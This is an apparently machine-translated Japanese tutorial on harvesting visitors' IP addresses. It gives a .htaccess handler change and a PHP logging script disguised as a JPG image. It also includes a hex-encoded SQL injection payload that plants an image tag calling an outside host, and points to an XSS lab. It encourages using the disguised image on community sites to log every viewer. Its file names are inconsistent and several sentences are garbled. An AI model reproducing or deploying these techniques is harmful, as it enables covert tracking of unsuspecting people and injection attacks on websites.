このチュートリアルでは、写真を使用して IP アドレスを盗む方法を学びます。私のアイデアは、.htaccess ファイルを変更して、jpg ファイルを php ファイルとして解析することです。
以下は .htaccess に追加する必要があるコードです:
AddHandler application/x-httpd-php5 .jpg
次に、次のコードをメモ帳にコピーし、grabber.jpg
<?php $fh = fopen(‘ip_list.txt', ‘a'); fwrite($fh, $_SERVER[‘REMOTE_ADDR'].” “); fclose($fh); $im = imagecreatefromjpeg(“n00b.png”); header(‘Content-Type: image/jpeg'); imagejpeg($im); imagedestroy($im); ?>
という名前を付けます。 アクセス許可を設定します。 grabber.jpg を 755 に変更し、別の写真を見つけて n00b.png という名前を付け、graber.jpg と同じディレクトリに置きます。
これで準備は完了です。誰かが photograbber.jpg を閲覧すると、その IP アドレスが記録されます。
(翻訳者注: これらは私たちの個人的な Web サイトスペースにアップロードする必要があります)
POC:
(翻訳者注: 著者は IP を取得する方法のデモンストレーション写真を投稿しました。皆様のプライバシーのため、私はまだ公開されていません)投稿された場合、読者は著者のブログにアクセスして確認できます)
この時点で、写真は作業を開始する準備ができています。
それではSQLiを使ってIPアドレスを取得する方法についても説明したいと思います。実際、写真を使用して IP アドレスを盗むのは非常に高速です。SQLi のこの方法を使用する理由はありませんが、読者にさらに知識を提供するために説明します:
http://leettime.net /sqlninja.com/tasks/basic_ch1.php?id=1' ユニオン選択 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61 622f696d6 1676569702f7472796d652e6a7067223e,3#
それでは、xss を使用して IP アドレスを取得する方法について説明しましょう:
http://leettime.net /xsslab1/chalg1.php? name=&submit=Search
それでは終わりです。
実際、ほとんどのコミュニティでは写真の公開が許可されているため、この方法を使用して写真にアクセスするすべての人の IP アドレスを取得できます。
上記は、編集者が PHP に基づいて写真から IP アドレスを取得する方法について紹介する関連コンテンツです。皆様のお役に立てれば幸いです。
以上、PHPをベースに写真によるIPアドレス取得の実装を紹介しましたが、IPアドレス取得の内容も含めて、PHPチュートリアルに興味のある友人の参考になれば幸いです。